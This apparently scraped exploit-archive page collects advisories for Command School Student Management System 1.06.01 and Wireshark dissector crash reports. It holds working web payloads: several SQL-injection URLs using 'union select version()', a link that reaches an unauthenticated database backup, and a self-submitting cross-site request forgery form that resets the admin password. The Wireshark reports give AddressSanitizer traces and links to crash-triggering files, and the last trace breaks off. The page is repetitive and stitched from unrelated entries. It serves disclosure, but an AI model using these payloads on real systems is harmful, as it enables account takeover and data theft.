source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141551
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
##############
VULNERABILITY
##############
/Backup/backup_ray2.php (LINE: 78-126)
-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");
// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}
// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{
// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");
// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");
// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{
// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
[Change Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.example.com/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>
Source: https://code.google.com/p/google-security-research/issues/detail?id=662
The following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
ERROR:wmem_core.c:50:wmem_alloc: assertion failed: (allocator->in_scope)
Program received signal SIGABRT, Aborted.
0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007fffe1c740d8 in __GI_abort () at abort.c:89
#2 0x00007fffe3707165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007fffe37071fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffee6b49f5 in wmem_alloc (allocator=<optimized out>, size=<optimized out>) at wmem_core.c:50
#5 0x00007fffeb0f7d40 in wmem_utoa (allocator=0x60700000bd90, port=512) at addr_resolv.c:604
#6 0x00007fffeb0f7c70 in udp_port_to_display (allocator=0x60700000bd90, port=512) at addr_resolv.c:2901
#7 0x00007fffec2e1998 in ipmi_fmt_udpport (s=0x7ffffffface0 "\030\366!\364\377\177", v=512)
at packet-ipmi.c:1283
#8 0x00007fffeb25d6ff in fill_label_number (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f", is_signed=0) at proto.c:7083
#9 0x00007fffeb2505e2 in proto_item_fill_label (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f") at proto.c:6651
#10 0x00007fffeb1f1799 in proto_tree_print_node (node=0x7ffe90b4c330, data=0x7fffffffc480) at print.c:164
#11 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4bd70,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#12 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4bd70, data=0x7fffffffc480) at print.c:219
#13 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4b0e0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#14 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4b0e0, data=0x7fffffffc480) at print.c:219
#15 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x619000152ef0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#16 0x00007fffeb1f1013 in proto_tree_print (print_args=0x7fffffffc6a0, edt=0x61300000de80,
output_only_tables=0x0, stream=0x602000340c10) at print.c:133
#17 0x000000000052b913 in print_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80) at tshark.c:4132
#18 0x00000000005266ff in process_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80, offset=24,
whdr=0x61400000f060, pd=0x61b000012d80 "", tap_flags=0) at tshark.c:3742
#19 0x000000000051f961 in load_cap_file (cf=0x14ac0c0 <cfile>, save_file=0x0, out_file_type=2,
out_file_name_res=0, max_packet_count=0, max_byte_count=0) at tshark.c:3484
#20 0x0000000000515db0 in main (argc=3, argv=0x7fffffffe248) at tshark.c:2197
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11831. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38994.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=661
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7849==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f8e33764094 at pc 0x7f8e29788726 bp 0x7ffe27806640 sp 0x7ffe27806638
READ of size 4 at 0x7f8e33764094 thread T0
#0 0x7f8e29788725 in dissect_zcl_pwr_prof_pwrprofstatersp wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21
#1 0x7f8e2977f2be in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3494:21
#2 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f8e297738ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f8e2974de40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21
#12 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f8e29757897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#17 0x7f8e297518aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#18 0x7f8e29752ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#19 0x7f8e271ab417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#20 0x7f8e2826863b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#21 0x7f8e2825e35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5
#22 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f8e271a2dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f8e27eb25f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f8e2719e33b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f8e2714c3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
0x7f8e33764094 is located 44 bytes to the left of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f8e337640c0) of size 64
0x7f8e33764094 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_pwrprofiles' defined in 'packet-zbee-zcl-general.c:3328:13' (0x7f8e33764080) of size 20
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21 in dissect_zcl_pwr_prof_pwrprofstatersp
Shadow bytes around the buggy address:
0x0ff2466e47c0: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
0x0ff2466e47d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff2466e47e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0ff2466e47f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4800: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
=>0x0ff2466e4810: 00 00[04]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff2466e4820: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4830: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0ff2466e4840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7849==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11830. Attached are three files which trigger the crash.
Update: there is also a similar crash due to out-of-bounds access to the global "ett_zbee_zcl_pwr_prof_enphases" array, see the report below.
Attached is a file which triggers the crash.
--- cut ---
==8228==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f0d4f321100 at pc 0x7f0d45344cd5 bp 0x7fff69e4e4a0 sp 0x7fff69e4e498
READ of size 4 at 0x7f0d4f321100 thread T0
#0 0x7f0d45344cd4 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25
#1 0x7f0d4533bd04 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3463:21
#2 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f0d453308ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f0d4530b750 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1680:9
#12 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f0d4530aee1 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1033:13
#17 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#20 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#21 0x7f0d45314897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#22 0x7f0d4530e8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#23 0x7f0d4530fef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#24 0x7f0d42d68417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#25 0x7f0d43e2563b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#26 0x7f0d43e1b40a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:594:5
#27 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f0d42d5fdbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#30 0x7f0d43a6f5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#31 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#32 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#33 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#34 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#35 0x7f0d42d5b33b in dissect_record wireshark/epan/packet.c:501:3
#36 0x7f0d42d093c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#37 0x5264eb in process_packet wireshark/tshark.c:3728:5
#38 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#39 0x515daf in main wireshark/tshark.c:2197:13
0x7f0d4f321100 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:4460:13' (0x7f0d4f321120) of size 128
0x7f0d4f321100 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f0d4f3210c0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25 in dissect_zcl_pwr_prof_enphsschednotif
Shadow bytes around the buggy address:
0x0fe229e5c1d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fe229e5c1e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0fe229e5c1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c200: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
0x0fe229e5c210: 00 00 04 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0fe229e5c220:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c230: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0fe229e5c240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8228==ABORTING
--- cut ---
Furthermore, there is yet another similar condition in a somewhat related area of code, see the attached file and report below:
--- cut ---
==8856==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f148fad2900 at pc 0x7f1485afc15d bp 0x7ffd41dc3de0 sp 0x7ffd41dc3dd8
READ of size 4 at 0x7f148fad2900 thread T0
#0 0x7f1485afc15c in dissect_zcl_appl_evtalt_get_alerts_rsp wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21
#1 0x7f1485afab0f in dissect_zbee_zcl_appl_evtalt wireshark/epan/dissectors/packet-zbee-zcl-ha.c:818:21
#2 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f1485ae18ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f1485abbe40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21
#12 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f1485ac5897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#17 0x7f1485abf8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#18 0x7f1485ac0ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#19 0x7f1483519417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#20 0x7f14845d663b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#21 0x7f14845cc35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5
#22 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f1483510dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f14842205f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f148350c33b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f14834ba3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
0x7f148fad2900 is located 32 bytes to the left of global variable 'ett' defined in 'packet-zbee-zcl-ha.c:1391:18' (0x7f148fad2920) of size 136
0x7f148fad2900 is located 0 bytes to the right of global variable 'ett_zbee_zcl_appl_evtalt_alerts_struct' defined in 'packet-zbee-zcl-ha.c:698:13' (0x7f148fad28e0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21 in dissect_zcl_appl_evtalt_get_alerts_rsp
Shadow bytes around the buggy address:
0x0fe311f524d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f524e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f524f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe311f52520:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52530: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0fe311f52540: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fe311f52550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8856==ABORTING
--- cut ---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38995.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=660
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7557==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7ff755ab5a18 at pc 0x7ff74b48f257 bp 0x7ffc467efe50 sp 0x7ffc467efe48
READ of size 4 at 0x7ff755ab5a18 thread T0
#0 0x7ff74b48f256 in dissct_rsl_ipaccess_msg wireshark/epan/dissectors/packet-rsl.c:3055:23
#1 0x7ff74b48a788 in dissct_rsl_msg wireshark/epan/dissectors/packet-rsl.c:3181:18
#2 0x7ff74b4951cb in dissect_rsl_ie_err_msg wireshark/epan/dissectors/packet-rsl.c:2206:14
#3 0x7ff74b48bf1b in dissct_rsl_msg wireshark/epan/dissectors/packet-rsl.c:3383:22
#4 0x7ff74b48a477 in dissect_rsl wireshark/epan/dissectors/packet-rsl.c:3847:14
#5 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#6 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#7 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#8 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#9 0x7ff7499e3344 in call_dissector wireshark/epan/packet.c:2692:9
#10 0x7ff74a88a7ee in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:365:5
#11 0x7ff74a889dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#12 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
